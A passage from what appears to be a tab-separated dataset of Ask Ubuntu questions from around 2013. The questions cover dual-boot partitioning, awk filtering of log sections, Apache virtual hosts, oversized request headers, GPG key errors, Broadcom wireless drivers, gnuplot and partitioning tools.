/dev/sda4 size : 127gib capacity : 127gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : hpfs/ntfs partition physical id : 5 logical name : /dev/sda5 capacity : 89gib *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : / capacity : 35gib configuration : mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered state=mounted *-logicalvolume:2 description : linux swap / solaris partition physical id : 7 logical name : /dev/sda7 capacity : 1991mib capabilities : nofs *-scsi:1 physical id : 2 logical name : scsi3 capabilities : emulated *-cdrom description : dvd-ram writer product : dvd rw ad-7710h vendor : optiarc physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.v0 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc sudo uname -a gave the following output : sudo uname -a linux sony-vpceh15en 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo lsb_release -a gave the following output : sudo lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise
340786	will all the drives be formatted if i replace windows 7 with ubuntu ?	hello i am a windows 7 user and i am planning to replace it by ubuntu . i have three drives and windows 7 is installed in drive c. i just want to know that weather all my drives will be formatted while replacing it with ubuntu or only c drive ( where my windows 7 is currently installed ) ?
340788	using if an awk command	i have a file which contains many sub-sections each starting with [ begin ] and ending with [ end ] sample of which is shown below : [ begin li1_1378184738754_91 ] header=7075|lime|0|0|109582|0|1|2700073||0|0|0| [ 355 ] |1|0|ssb-li1-1378184738754-90||0||lime |0|saved=true|0.002406508312038836|0| [ ser=zu1 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=uzu6 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=xzs5 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=sv-stda-zu3 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=hzu8 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=lzu3 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=yzu2 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=xzu7 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] |0|null|false|40||false| attrs=0|0|0||0| ptitle=690751404|1|1|1|rest:1998636||||||2700401|175619|900.5636134725806|0.985486|39.166666666666664| $ 9.99|100.0|1||| seller=1998636|1|9.99|1|-1||0|||||true||4.7937584|10412|false| ptitle=5543369186|2|1|1|rest:1533891||||||2700211|19615|886.8211044369053|0.776121|34.0| $ 119.99|100.0|1||| seller=1533891|1|119.99|3|-1|1.0 : text , in+size+6.0 % 2c7.0 % 2c8.0 % 2c8.5 % 2c9.0 % 2c9.5 % 2c10.0 % 2c ... ,0.0 , , , ,0,0 , |2|||||true||2.95|20|true| ptitle=622529158|3|1|1|||||||2700408|67402|796.5289827432475|0.893899|63.0| $ 5.27|100.0|1||| seller=4281413|1|5.27|1|-1||0|||||true||4.695052|1769|true| ptitle=5507199621|4|1|1|||||||2700220|56412|706.9031281251306|0.791171|45.0| $ 99.99|100.0|1||| seller=4806107|1|-1.0|1|-1|1.0 : sale , $ ,30.000000000000014,0.0 , , , ,0,0 , :text , in+size+6.0 % 2c6.5 % 2c7.0 % 2c7.5 % 2c8.0 % 2c8.5 % 2c9.0 % 2c9 ... ,0.0 , , , ,0,0 , |2|||| $ 130 $ 30.00 off|false||5.0|1|false| ptitle=5502728013|5|1|1|||||||900000|0|698.7772340643119|0.836740|75.0| $ 40.95|100.0|1||| seller=955448|1|40.95|1|-1||0|||||false||4.142857|7|false| ptitle=840662011|6|1|1|rest:265238||||||300233|62718|683.2927820751431|0.995513|52.0| $ 22.95|100.0|1||| seller=265238|1|22.95|1|-1||0|||||false||4.478261|23|false| ptitle=848084980|8|1|1|||||||2700073|145653|670.4809846773688|0.880587|60.0| $ 24.99|100.0|1||| seller=5267046|1|24.99|1|-1||0|||||true||0.0|0|false| ptitle=891200492|9|1|1|rest:1030132||||||2701003|17215|668.8437575254773|0.825491|32.0| $ 519.99|100.0|1||| seller=1030132|1|519.99|1|-1||0|||||false||4.7391305|23|false| ptitle=641974054|10|1|1|||||||900000|69433|667.6678790058678|0.752129|57.0| $ 4.19|100.0|1||| seller=3365158|1|4.19|1|-1||0|||||true||4.70907|4410|true| ptitle=517591869|12|1|1|rest:4802895||||||2700408|127644|643.0972570735605|0.893899|17.25| $ 23.95|100.0|1||| seller=4318776|1|-1.0|3|-1||0|||||false||0.0|0|false| ptitle=541549480|13|1|1|rest:1180414||||||2702000|105832|597.4904572011968|0.752129|24.666666666666664| $ 8.27|100.0|1||| seller=4636561|1|8.27|1|-1||0|||||false||4.8283377|734|true| ptitle=1020561900|14|1|1|||||||2700063|159813|594.4717491579845|0.934869|75.0| $ 5.39|100.0|1||| seller=4722645|1|5.39|1|-1|1.0 : sale , $ ,0.6000000000000005,0.0 , , , ,0,0 , :text , free+shipping+on+all+orders % 21,0.0,201301010000/ , ,,0,0 , |2|||| $ 5.99 $ 0.60 off|true||4.3942246|1593|true| ptitle=507792308|15|1|1|rest:4683455||||||2702000|105832|591.7739184402442|0.768311|22.5| $ 9.48|100.0|1||| seller=4910651|1|-1.0|2|-1||0|||||false||5.0|1|false| ptitle=1090571346|16|1|1|rest:4452919||||||2700211|20824|776.4814913363535|0.776121|35.0| $ 59.99|100.0|1||| seller=1533891|1|59.99|1|-1|1.0 : sale , $ ,49.99999999999999,0.0 , , , ,0,0 , :text , in+size+7.5 % 2c8.0 % 2c8.5 % 2c9.0 % 2c9.5 % 2c10.0 % 2c10.5 ... ,0.0 , , , ,0,0 , |2|||| $ 110 $ 50.00 off|true||2.95|20|true| ptitle=573017390|17|1|1|||||||2700073|91937|679.695660577044|0.880587|33.5| $ 14.85|100.0|1||| seller=4281413|1|14.85|1|-1||0|||||true||4.695052|1769|true| ptitle=5502723300|18|1|1|||||||900000|0|639.3095640940136|0.836740|75.0| $ 50.95|100.0|1||| seller=955448|1|50.95|1|-1||0|||||false||4.142857|7|false| ptitle=940022974|20|1|1|||||||2700600|58701|569.9503499778303|0.875839|59.0| $ 14.40|100.0|1||| seller=4825227|1|14.4|1|12||0|||||true||4.0289855|276|true| ptitle=5513277553|21|1|1|||||||2700220|56412|565.2712749001105|0.776121|44.33333333333333| $ 129.95|100.0|1||| seller=4825252|1|129.95|1|23||0|||||true||4.0289855|276|true| ptitle=890329961|22|1|1|||||||2700408|133796|564.7642425785796|0.837916|34.75| $ 61.95|100.0|1||| seller=4825235|1|61.95|4|19||0|||||true||4.0289855|276|true| ptitle=753852910|24|1|1|||||||2700073|146738|557.7419123688652|0.934869|47.69230769230769| $ 26.99|100.0|1||| seller=4722645|1|26.99|10|-1|1.0 : sale , $ ,3.0,0.0 , , , ,0,0 , :text , free+shipping+on+all+orders % 21,0.0,201301010000/ , ,,0,0 , |2|||| $ 29.99 $ 3.00 off|true||4.3942246|1593|true| ptitle=654738989|26|1|1|||||||900000|84012|554.7756559595525|0.752129|57.0| $ 3.19|100.0|1||| seller=3365158|1|3.19|1|-1||0|||||true||4.70907|4410|true| ptitle=707747307|27|1|1|rest:4736009||||||2700063|76249|552.234395428327|0.889614|19.857142857142854| $ 6.39|100.0|1||| seller=4736009|1|6.39|1|-1||0|||||false||4.8071113|15356|true| ptitle=63531001|28|1|1|||||||2700408|82712|625.0421885589608|0.893899|47.166666666666664| $ 7.69|100.0|1||| seller=4281413|1|7.69|3|-1||0|||||true||4.695052|1769|true| ptitle=5502728016|29|1|1|||||||900000|0|605.9895507237038|0.836740|75.0| $ 503.00|100.0|1||| seller=955448|1|503.0|1|-1||0|||||false||4.142857|7|false| ptitle=507792308|31|1|1|rest:4683455||||||2702000|105832|559.6902659046442|0.752129|22.5| $ 8.99|100.0|1||| seller=5105812|1|-1.0|1|-1||0|||||false||0.0|0|false| ptitle=753852910|32|1|1|||||||2700073|146738|545.9987095658629|0.870929|47.69230769230769| $ 22.49|100.0|1||| seller=4143386|1|22.49|6|-1|1.0 : sale , $ ,7.5,0.0 , , , ,0,0 , :text , free+shipping+on+orders+over+ % 24100,0.0,201109010000/201409302359 , ,,0,0 , |2|||| $ 29.99 $ 7.50 off|false||4.7316346|2355|true| ptitle=5513277553|33|1|1|rest:1533891||||||2700220|56412|653.3133907916089|0.825491|44.33333333333333| $ 149.99|100.0|1||| seller=1533891|1|149.99|3|-1|1.0 : text , in+size+5.0 % 2c5.5 % 2c6.0 % 2c6.5 % 2c7.0 % 2c7.5 % 2c8.0 % 2c8 ... ,0.0 , , , ,0,0 , |2|||||true||2.95|20|true| ptitle=63531001|34|1|1|||||||2700408|82712|541.8233547780552|0.893899|47.166666666666664| $ 7.72|100.0|1||| seller=2370155|1|7.72|4|-1||0|||||false||4.85|40|false| ptitle=1018957017|35|1|1|||||||2700073|145653|540.6093714604533|0.860614|56.0| $ 25.95|100.0|1||| seller=5036683|1|25.95|1|-1||0|||||false||4.8405056|366|false| ptitle=743682867|36|1|1|||||||2700073|63437|539.5985846455641|0.870929|58.0| $ 46.99|100.0|1||| seller=193176|1|46.99|1|-1||0|||||true||4.8511987|1418|true| ptitle=679858288|37|1|1|||||||2700063|188669|535.1360632897284|0.902031|30.0| $ 12.41|100.0|1||| seller=4143386|1|12.41|2|-1|1.0 : sale , $ ,1.379999999999999,0.0 , , , ,0,0 , :text , free+shipping+on+orders+over+ % 24100,0.0,201109010000/201409302359 , ,,0,0 , |2|||| $ 13.79 $ 1.38 off|false||4.7316346|2355|true| ptitle=994328713|38|1|1|||||||2700073|71463|534.7715925279717|0.870929|58.0| $ 1.29|100.0|1||| seller=1787388|1|1.29|1|-1||0|||||false||4.680464|3624|false| ptitle=886915818|40|1|1|||||||2700444|201835|529.7519801432289|0.934869|65.5| $ 44.99|100.0|1||| seller=4561883|1|44.99|2|-1||0|||||true||4.7913384|508|false| seller_hidden=227502|990765963|1147436601|-1 seller_hidden=5310958|622529158|5645627277|-1 seller_hidden=4825254|5543369186|5651114316|23 seller_hidden=5289138|5548930281|5653769481|-1 [ end li1_1378184738754_91 ] i am trying to run the command cat /home/nextag/logs/outpdirimpressions.log.2013-09-02 | awk -f `` $ begin '' ' { print $ 0 } ' | awk ' $ 0 ~ `` header=7075 '' { print $ 0 } ' as per this command i want to split the entire file into sub-sections beginning with the word 'begin ' . now in that i want those sub-sections which contains 'header=7075' expected output is that it will print the entire sub-section ( those which contain that string ) , but i am getting only this portion as output : header=7075|lime|0|0|109582|0|1|2700073||0|0|0| [ 355 ] |1|0|ssb-li1-1378184738754-90||0||lime |0|saved=true|0.002406508312038836|0| [ ser=zu1 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=uzu6 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=xzs5 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=sv-stda-zu3 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=hzu8 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=lzu3 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=yzu2 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] [ ser=xzu7 : mtu=model_other_20120806calibex.csv : mu=model_other_20120806calibex.csv : scorerclassused=linearpersonalizedproductsearchscorer ] |0|null|false|40||false| i have tried using if in various ways , but it does n't works . can somebody please help me . i tried awk -f `` $ begin '' ' { if ( $ 0 ~ `` header=7075 '' ) { print $ 0 } } ' /home/nextag/logs/outpdirimpressions.log.2013-09-02 . it gave the same result can somebody please suggest that how do i get the complete sub-section in the result
340789	why i can not shutdown or reboot from lightdm ?	i am unable to reboot or shutdown from lightdm . when i click on the button `` shutdown '' or `` reboot '' in the pop-ups simply nothing happens . i can not find nothing wrong in /var/log/lightdm/lightdm.log anyone can help me ? thanks in advance .
340791	virtual host on different port	i am getting a little desperate here . i am trying to move my phpmyadmin into address : http : //domain.com:5801 i have added to port.conf : listen 5801 servervirtualname *:5801 and created ( and enabled ) new site : < virtualhost *:5801 > servername domain.com documentroot /var/www/phpmyadmin errorlog /var/www/domain.com/logs/error_phpmyadmin.log customlog /var/www/domain.com/logs/access_phpmyadmin.log combined < /virtualhost > restarted server of course , but still can not load http : //domain.com:5801 . can someone please help me and tell me what im doing wrong ? thank you !
340792	size of a request header field exceeds server limit due to many if-none-match values	here 's an interesting case of a client getting the a `` 400 bad request '' error and seemingly unable to view a drupal home page hosted on ubuntu 12.04.3 lts using apache/2.2.22 : bad request your browser sent a request that this server could not understand . size of a request header field exceeds server limit . packet sniffing output : ... t 2013/09/02 15:23:10.458167 # # # . # # # . # # # . # # # :40027 - > # # # . # # # . # # # . # # # :80 [ a ] get / http/1.0 . if-none-match : `` 1363160742-0 '' , `` 1363165573-1 '' , `` 1363175854-1 '' , `` 1363175854-0 '' , `` 1363179616-0 '' , `` 1363181811-0 '' , `` 1363239319-1 '' , `` 1363255903-0 '' , `` 1363259282-0 '' , `` 1363263398-1 '' , `` 1363274564-0 '' , `` 1363329642-0 '' , `` 1363332613-1 '' , `` 1363333851-0 '' , `` 1363599826-0 '' , `` 1363678909-0 '' , `` 1363684227-1 '' , `` 1363699732-0 '' , `` 1363755181-0 '' , `` 1363765691-1 '' , `` 1363767178-0 '' , `` 1363780208-0 '' , `` 1363787589-0 '' , `` 1363795259-1 '' , `` 1363852409-1 '' , `` 1363863225-1 '' , `` 1363928115-0 '' , `` 1363951793-0 '' , `` 1363951793-1 '' , `` 1364133610-1 '' , `` 1364187608-1 '' , `` 1364187608-0 '' , `` 1364203083-0 '' , `` 1364208174-0 '' , `` 1364214930-0 '' , `` 1364219815-0 '' , `` 1364274441-1 '' , `` 1364280930-0 '' , `` 1364280930-1 '' , `` 1364286055-1 '' , `` 1364298840-0 '' , `` 1364298840-1 '' , `` 1364360674-0 '' , `` 1364364356-1 '' , `` 1364381508-0 '' , `` 1364385520-1 '' , `` 1364460734-0 '' , `` 1364882595-1 '' , `` 1364903271-0 '' , `` 1364967946-0 '' , `` 1364967946-1 '' , `` 1364981713-0 '' , `` 1364985142-1 '' , `` 1364992835-1 '' , `` 1365061578-0 '' , `` 1365065290-1 '' , `` 1365076128-0 '' , `` 1365141088-1 '' , `` 1365167701-0 '' , `` 1365171024-0 '' , `` 1365402404-1 '' , `` 1365402404-0 '' , `` 1365411731-1 '' , `` 1365416882-0 '' , `` 1365476715-0 '' , `` 1365487578-0 '' , `` 1365488880-1 '' , `` 1365503922-1 '' , `` 1365514224-1 '' , `` 1365579101-0 '' , `` 1365580320-0 '' , `` 1365582817-0 '' , `` 1365584926-0 '' , `` 1365589524-0 '' , `` 1365608307-0 '' , `` 1365649987-0 '' , `` 1365682295-0 '' , `` 1365685083-0 '' , `` 1365770532-1 '' , `` 1365770532-0 '' , `` 1365844566-0 '' , `` 1365996619-1 '' , `` 1366093719-1 '' , `` 1366093719-0 '' , `` 1366115408-0 '' , `` 1366180275-1 '' , `` 1366186431-0 '' , `` 1366196476-0 '' , `` 13662669 ... at this stage i am not 100 % sure whether it is just limited to a specific client but the error was reported by a user with the following user agent string : mozilla/5.0 ( macintosh ; intel mac os x 10_7_5 ) applewebkit/534.57.7 ( khtml , like gecko ) version/5.1.7 safari/534.57.7 now the question remains what to do , is it a server issue or just a misbehaving client ?
340794	disable ubuntu gnome 13.04 sound amplicifation	i 've got a small problem with sound amplification . i use the volume-buttons on my keyboard a lot ( much closer than the volume button of my sound system ) . when i press the volume up key , the overall system sound goes beyond the 100 % amplification bar . thus , i get incredible bad sound . i really do n't like that . i 've read some possibilities to fix this , but the answers are a bit messy . so , therefore , is it possible to disable sound amplification completely ? and how do i do that ? in the sound dialog box i can change the output-volume , but that 's it . i ca n't set the max volume output . hope someone can help me !
340796	ubuntu 12.04 installation partition trouble	i have windows 7 in disk drive c : and my disk drive d : \ has 155 gb space.i want to install ubuntu on this disk drive but i want ubuntu to allow only 25 -- 30 gb space from disk drive d : .then how should i make partition in d : \ drive ? plz help
340801	gpg error in ubuntu update	when i run the sudo apt-get update , it results in the following reading package lists ... done w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey a1715d88e1df1f24 w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey 551ce2fb4cbedd5a w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey 1e9377a2ba9ef27f by googling i came to know the key is missing , and it can be obtained by running the following command with the corresponding hexadecimal numbers saikirangvr @ ubuntu : ~ $ sudo gpg -- keyserver subkeys.pgp.net -- recv 551ce2fb4cbedd5a but i was not able to fix this as this gave me the error gpg : warning : unsafe ownership on configuration file `/home/saikirangvr/.gnupg/gpg.conf' gpg : external program calls are disabled due to unsafe options file permissions gpg : keyserver communications error : general error gpg : keyserver receive failed : general error i tried many times but i was unable to fix . i was behind a proxy server in my college and i have configured the ubuntu well to use behind the proxy . after using sudo chown -r saikirangvr : saikirangvr /home/saikirangvr/.gnupg the problem of unsafe ownership was gone , and it gave the following ... . sai @ ubuntu : ~/gpgpu-sim/ispass2009-benchmarks $ gpg -- keyserver keyserver.ubuntu.com -- recv 1e9377a2ba9ef27f gpg : requesting key ba9ef27f from hkp server keyserver.ubuntu.com gpgkeys : key 1e9377a2ba9ef27f not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 sai @ ubuntu : ~/gpgpu-sim/ispass2009-benchmarks $ gpg -- keyserver subkeys.pgp.net -- recv 1e9377a2ba9ef27f gpg : requesting key ba9ef27f from hkp server subkeys.pgp.net gpgkeys : key 1e9377a2ba9ef27f not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 the result of adding the ppa sai @ ubuntu : ~ $ sudo add-apt-repository ppa : nilarimogard/webupd8 [ sudo ] password for sai : error reading https : //launchpad.net/api/1.0/~nilarimogard/+archive/webupd8 : could n't resolve host 'launchpad.net' same error occurs when using launch pad get keys sai @ ubuntu : ~ $ sudo launchpad-getkeys please wait ... launchpad-getkeys is running an update so it can detect the missing gpg keys trying to import all the missing keys gpg : requesting key 4c9d234c from hkp server keyserver.ubuntu.com gpgkeys : key 531ee72f4c9d234c not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 gpg : requesting key ba9ef27f from hkp server keyserver.ubuntu.com gpgkeys : key 1e9377a2ba9ef27f not found on keyserver gpg : no valid openpgp data found . gpg : total number processed : 0 launchpad-getkeys has finished importing all missing gpg keys . try running sudo apt-get update - you should n't see any key errors anymore what is the problem . *is there any other method to solve this like through gui * ... ... .
340806	does openbox cause an ubuntu internal error ?	i get this error constantly , and i do n't know what should i do : ( i use the lubuntu 12.04 does lxde come with openbox , i do n't know whether i have installed openbox . ps.i found when i right-click the gnome-terminal , the screen flashed and the error occurs .
340808	symlinks in /var/www/html do n't work on a 64 bit machine	strange problem . i have a 32 bit machine `` a '' running apache where when i create a symlink to a directory and access that link on the browser , i am able to see the contents of that directory . but on a 64-bit machine `` b '' that is running the same version of apache , the page shows `` forbidden '' message . i have created the links as `` root '' user . i am unable to access the links from either machine as `` root '' user but as a regular user it works fine . why is it that the symlinks work on one and not on the other ? does it have something to with the 32/64-bit machine ( although i strongly feel it does not matter ) . if i change the permissions of the directory to which i have given the symlinks to , it works from machine b . but i am not actually supposed to change the permissions like that . any help would be greatly appreciated .
340809	how can i adjust the default passphrase caching duration for gpg/pgp/ssh keys ?	as far as i know , gnome-keyring-daemon caches passphrases for keys by default until i log out . i would like to set the default to something like `` cache for 10 minutes '' . how can i do that in ubuntu 12.04 precise ? thanks a lot !
340816	how can i restart the menu bar in unity ?	my unity menu bar is no longer working . clicking on top-level menu items ( on the right hand general menu items , or on the app-specific items on the left ) registers visually , but menus do n't drop down . ( for example , clicking on the microphone icon causes the icon to flash , noting i clicked there , but the sound menu does not drop down ) . how can i restart the menu bar without exiting unity .
340821	ubuntu 12.04 failed to reboot after unsuccessful update done on 28/8/2013	i did update on 28/8/2013 . it includes the kernel update , mesa update , firefox , thunderbird , python , etc ... before all updates finishes , my internet connection terminated , so in the next reboot my laptop did not start at all . i read all post regarding editing grub menu and setting nomodeset option along with other options but none of them worked for me . except quiet splash nomodeset vga=0ă31 and quiet splash i915.modeset=1 gives me only front booting screen , but no progress , like dots moving in a front screen of ubuntu ... it did not bootup though . only option was ctrl+alt+del when i press ctrl+alt+del it starts booting ... it shows dots moving ... but since it is rebooting , it does nott load ubuntu . when i am pressing ctrl+alt+f2 , i am reverting to command line , when i tried to run firefox from command-line , it shows message : no display specified x11 initiallization failed i tried to run in failsafe graphic mode but got error message as : xinit/ ; unable to run server /usr/bin/x non integer argument /usr/shre/xdiagnose/failsafeserver : line 87 : [ -lt : unary operator expected gdm : unrecognized service stop : unknown instance : xinit /usr/share/xdiagnose/failsafe xinit /etc/x11/xorg.conf.failsafe with- -- /usr/bin/x -br -once -config /etc/x11/xorg.conf.failsafe -logfile /var/log/xorg.failsafe.log xinit : unable to run server `` /usr/bin/x '' no such file or directory p.s . but i checked at /usr/bin/xorg i found server is present there error message in /var/log/syslog : acpi _osc request failed , returned control mask:0x1d not able to boot from livecd : when i tried to boot from pendrive , laptop shows a blank screen with blinking cursor , after waiting for 15 min , no progress so hard reset . do n't suggest me to replace ubuntu 12.04 . my laptop configuration is : samsung np300e5z , 4gb ram , intel i5 2nd generation with inbuilt graphics 3000 series , windows7 and ubuntu12.04 in dual boot mode . i am able to login to windows without any problem , so i think it is not grub problem . i checked almost 40 posts and related discussion , but non of them worked for me .
340831	command to know software version from terminal before installing	am trying to install bibletime v2.9.2 . i purged v2.8 , added the crosswire ppa ( ppa : pkgcrosswire/ppa ) to my software sources and did a sudo apt-get update . since i do n't have a fast internet connection , i wanted to know the bibletime version available before installing it via terminal . i 'd be glad if anyone can point me in the right direction . thanxs .
340835	gnuplot make a chart with one column witch in not exict	i want to write gnuplot command for a file which just i have one column of that . in the file and that column is y , but in the file i do n't have x 's column.x 's column element are 1 2 3 4 5 6 7 .pay attention to the belowe think they are my in file witch they '' 12 43 65 76 12 56 '' as you see i have y 's element but i do not have x 's element in my file , i mean x elemat is based on the row number.i guess there should be an command in gnuplot which does this .
340836	ubuntu 12.04 on dell inspiron - wireless stopped working	i recently re-installed ubuntu 12.04 on my dell machine . after re-installation , i had problems installing wireless driver under additional drivers . i tried a lot of different things , ultimately removing bcmwl-kernel-source and installing firmware-b43-lpphy-installer and b43-fwcutter . initially , nothing happened , but then out of the blue , i checked the internet tab and could see my network . i was able to connect and use wireless all day yesterday , but now it is n't working again . under internet icon in upper right hand corner , computer says wireless is enabled , but wireless networks are disconnected . below i 've included some info . > lspci -nnk | grep -ia2 net 09:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] ( rev 13 ) subsystem : dell device [ 1028:02aa ] kernel driver in use : sky2 -- 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel driver in use : b43-pci-bridge > iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lsmod nls_iso8859_1 12713 0 dm_crypt 23051 0 arc4 12573 2 bnep 18258 2 snd_hda_codec_idt 71153 1 snd_hda_intel 44339 3 parport_pc 28284 0 rfcomm 47864 0 snd_hda_codec 141716 2 snd_hda_codec_idt , snd_hda_intel ppdev 17113 0 bluetooth 247024 10 bnep , rfcomm lp 17799 0 b43 392109 0 parport 46562 3 parport_pc , ppdev , lp snd_hwdep 13668 1 snd_hda_codec snd_pcm 102477 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 joydev 17613 0 mac80211 630977 1 b43 snd_rawmidi 30417 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61930 2 snd_seq_midi , snd_seq_midi_event coretemp 13596 0 snd_timer 29989 2 snd_pcm , snd_seq uvcvideo 82214 0 snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq cfg80211 525244 2 b43 , mac80211 snd 69533 15 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device gpio_ich 13526 0 videobuf2_core 40785 1 uvcvideo psmouse 97873 0 soundcore 12680 1 snd videodev 130053 2 uvcvideo , videobuf2_core snd_page_alloc 18798 2 snd_hda_intel , snd_pcm dell_laptop 17425 0 dell_wmi 12681 0 videobuf2_vmalloc 13056 1 uvcvideo lpc_ich 17144 0 serio_raw 13215 0 videobuf2_memops 13202 1 videobuf2_vmalloc microcode 23017 0 mac_hid 13253 0 bcma 41244 1 b43 sparse_keymap 13890 1 dell_wmi dcdbas 14449 1 dell_laptop hid_generic 12540 0 usbhid 47346 0 hid 105549 2 hid_generic , usbhid ums_realtek 18256 0 usb_storage 61749 1 ums_realtek i915 620421 3 wmi 19256 1 dell_wmi drm_kms_helper 49597 1 i915 ahci 25879 1 drm 287564 4 i915 , drm_kms_helper libahci 31606 1 ahci i2c_algo_bit 13564 1 i915 sky2 62824 0 video 19652 1 i915 ssb 57842 1 b43 > rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no > sudo dpkg -s firmware-b43-lpphy-installer package : firmware-b43-lpphy-installer status : install ok installed priority : optional section : contrib/kernel installed-size : 34 maintainer : ubuntu developers architecture : all source : b43-fwcutter version : 1:015-9 depends : b43-fwcutter ( > = 1:015-9 ) , bzip2 , wget recommends : linux-image conflicts : firmware-b43-installer description : installer package for firmware for the b43 driver ( lp-phy version ) this package installs the firmware needed for usage of the b43 kernel driver . . supported chipsets : - bcm4312 ( with low-power aka lp-phy ) original-maintainer : fabrizio regalli homepage : http : //wireless.kernel.org/en/users/drivers/b43 > dmesg | grep -e wlan -e b43 [ 20.908424 ] b43-phy0 : broadcom 4312 wlan found ( core revision 15 ) [ 20.952236 ] b43-phy0 : found phy : analog 6 , type 5 ( lp ) , revision 1 [ 29.164261 ] b43-phy0 : loading firmware version 478.104 ( 2008-07-01 00:50:23 ) [ 34.704994 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 34.705415 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready
340837	windows 7 & ubuntu install ( uefi & gpt partition )	i got a new 1tb disk - so i installed ubuntu ( 13.04 64bit ) on it to test it out . i could n't boot to it for some reason so i deleted the partition in windows and formatted the drive ( ntfs ) . then i installed windows 7 x64 onto the same drive . my plan was to install ubuntu after the windows install . when i sparked up the ubuntu live cd , the installer did not detect my windows 7 install and asked to wipe the disk or partition manually ( instead of `` install alongside windows ... '' so i went into a partition utility in windows and notice i had on the drive : gpt drive 100 mb partition 128 mb partition remaining space , rest of drive i was surprised to see a gpt partition instead of a mbr ? i do have a uefi bios and win7 x64 - which can handle this , and i do n't mind it - however this setup seems to be confusing the ubuntu installer . i do n't want some kind of kooky ( possibly ) corrupt/broken partition table on this drive ( if that 's what 's going on ) . is there any way i can 'fix ' this without re-installing windows on this drive ? if i do partition manually - would i have issues later on ? what 's the best way to handle this ? thanks !
340839	scanning and making into a .jpg	how do scan a document to make it into a .jpg . i have an epson cx3650 and open office but this only saves in .odg which is not recognised in such things a facebook and other programmes .
340841	the state of partitioning tools ?	what is the state of partitioning tools in linux ? which tools are recommend and which should i stay away from ? namely i am interested in fdisk , cfdisk , sfdisk and the fdisk and cfdisk variants that come in the gnu-fdisk package . the `` go to '' solution these days would be parted i assume ? i am asking this because i used to use cfdisk years ago , but now i am sitting here with a new 3tb disk and cfdisk is displaying completely wrong information , it 's displaying a partition as 375gb in size and free space available even so there is a single partition of 3tb and no free space . if i switch over to cfdisk from the gnu-fdisk package , it will display correct information , but now fdisk.gnu-fdisk wo n't display anything . meanwhile the regular fdisk that comes by default with ubuntu would display things correctly . sfdisk seems to work , but is lacking support for the newer gpt partition tables . essentially half of those tools do n't seem to work properly . so should i just forget them and do everything with parted from now on ? are the gdisk tools ready for prime time or are there any drawbacks to using gpt ? are there other tools i should be aware of ?
